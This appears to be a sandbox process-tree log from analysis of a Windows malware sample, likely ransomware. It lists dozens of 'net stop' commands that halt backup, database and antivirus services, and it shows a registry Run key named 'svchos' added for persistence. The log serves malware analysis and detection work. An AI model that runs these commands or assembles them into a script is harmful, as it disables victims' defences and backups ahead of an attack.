C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y4⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y5⤵PID:2536
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y4⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y5⤵PID:2188
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y4⤵PID:2832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵PID:1244
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y4⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y5⤵PID:2512
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y4⤵PID:1640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y5⤵PID:3012
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y4⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y5⤵PID:2720
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y4⤵PID:2424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y5⤵PID:1668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y4⤵PID:2592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y5⤵PID:1228
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y4⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y5⤵PID:2656
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y4⤵PID:3048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y5⤵PID:2468
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y4⤵PID:2956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y5⤵PID:2248
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y4⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y5⤵PID:2736
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y4⤵PID:2228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y5⤵PID:3000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y4⤵PID:1624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y5⤵PID:1792
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y5⤵PID:2496
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y4⤵PID:2068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y5⤵PID:3064
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y4⤵PID:2684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y5⤵PID:2336
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y4⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y5⤵PID:1996
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y4⤵PID:2772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y5⤵PID:2084
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y5⤵PID:960
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y4⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y5⤵PID:2316
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y4⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y5⤵PID:2088
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y4⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y5⤵PID:828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y4⤵PID:2000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y5⤵PID:2300
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y4⤵PID:1312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y5⤵PID:2432
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵PID:428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵PID:2668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y4⤵PID:2320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y5⤵PID:2244
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵PID:2456
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:2332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵PID:2128
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y4⤵PID:1760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y5⤵PID:2824
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y4⤵PID:2992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y5⤵PID:1032
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y4⤵PID:1256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y5⤵PID:1660
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y5⤵PID:1896
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y4⤵PID:540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y5⤵PID:2588
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y4⤵PID:2624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y5⤵PID:2924
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y4⤵PID:2572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y5⤵PID:2344
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y5⤵PID:2832
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y4⤵PID:2360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y5⤵PID:2212
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y4⤵PID:652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y5⤵PID:2536
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y4⤵PID:2200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y5⤵PID:1752
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y4⤵PID:1376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y5⤵PID:1120
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y4⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y5⤵PID:1640
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y4⤵PID:3040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y5⤵PID:3012
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y4⤵PID:2616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y5⤵PID:1632
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y4⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y5⤵PID:2380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y4⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y5⤵PID:2472
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y4⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y5⤵PID:1972
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y4⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y5⤵PID:304
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y4⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y5⤵PID:2920
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵PID:2900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵PID:2232
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y4⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y5⤵PID:2448
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y4⤵PID:2496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y5⤵PID:1816
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y4⤵PID:2884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y5⤵PID:2684
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfefire /y4⤵PID:2340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y5⤵PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\aCBlj.exe" /f4⤵PID:1540
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\aCBlj.exe" /f5⤵
- Adds Run key to start application
PID:2084
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "49292760911824047601713768551-13609149652138848815234813462-1354040014-1576991462"1⤵PID:2184
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "181265466510080933891153529039-744618971909865188-2087158886-1377079235-889850515"1⤵PID:3056
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1510268686-445233881-1370159665481753691688363120317980511-67886349724032549"1⤵PID:2784
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-484858561879949640-1080418893959233827-147140800636686608-606569290-1988301528"1⤵PID:616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1171676860-7570759481971276166205304423917764698770944631894004630702013179"1⤵PID:1348
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-4440116541089757008-15396053451983307702-1450606030-177242504-1086286471-1072557347"1⤵PID:1792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-108447273913969585782051962440-114552774117216242536031249777970416-1802442741"1⤵PID:2520
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3566714691190449294-58543920383428077-1095539277-52871211232210352587639592"1⤵PID:564
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-10431177411552466418331795750-310495189-1527028303-5069684551524641311-568838226"1⤵PID:1108
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "169745146617134351871613656063-1923302307-138210608624258488919213232921140672302"1⤵PID:2344
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "16319317131452541462101579832-19734458471129945224-1323712742-18809400971898385953"1⤵PID:2696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "773251363-19288581251597858232-504002407-1601479909-307220607-1597314872216337762"1⤵PID:1376
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-762841541-266297831178069147293928204-17062407038804013581543232989160746963"1⤵PID:1540
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1779867140894501814-1300322929-1677696514-18865677109654050578430534931966212799"1⤵PID:2240
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "669333195-8466812091403471957-8909091384140693852052656120198828894-716170236"1⤵PID:1172
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-519124998-4852590601266036023194624404373557271-1224683684-2110210519-58311032"1⤵PID:2220
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1202454660-2099604210-2455088653512964011812725374184379081-17414225301455098644"1⤵PID:984
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "182717077917535517651387887679-1501132767-39551803817090868601260651582-1286587935"1⤵PID:2608
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "408898415744717338844790787263843541136091916373031541-667261120-313541732"1⤵PID:2784
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15351565541867429891151073950740618644-186282481316631413631391871379435118000"1⤵PID:916
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3399368681027089969-441866599-1035538011559769236-630773661183424059585915795"1⤵PID:2280
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "180725459-1602870377-3588563416371873369871340611913489780-369930237-143122945"1⤵PID:2576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "975537676-840932900-17842381914226860101090063903-263633971-18005702491547281508"1⤵PID:1372
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "117754715234638602-8554423571307663267856368871131070802859391077-634186041"1⤵PID:2792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1412013668-14084596-1221082302-1705711239-767958842-2017669912-21199532-1310085423"1⤵PID:2916
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1745562591152587442-330769118215442580-102786621877492116311809474701765536933"1⤵PID:2236
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1031718030-232794762147319524-2061205003-8855940801776124931606612105-604896792"1⤵PID:2388
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "128694380438776447313100743011272049313-612306023-8558954801198096464892876005"1⤵PID:832
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1167431056-808866167-761971904-1209379004181544782212958229981693238603-306006216"1⤵PID:2372
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-682937783-8176710991108214549-2106705014184823273-12481773141191835683660454319"1⤵PID:1876
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-224819285-790500775-508688610316409205906497131-666465444487328479925455816"1⤵PID:2424
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-426506928168182492023625669122327775411035867772097355991-361951038929596916"1⤵PID:3048
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "51628524951035884126293087438907443020177063231900555200-14721554591946163253"1⤵PID:1472
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "5582236121458453934127618460170431757421423869571357916918-2564199361685300056"1⤵PID:2452
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:2420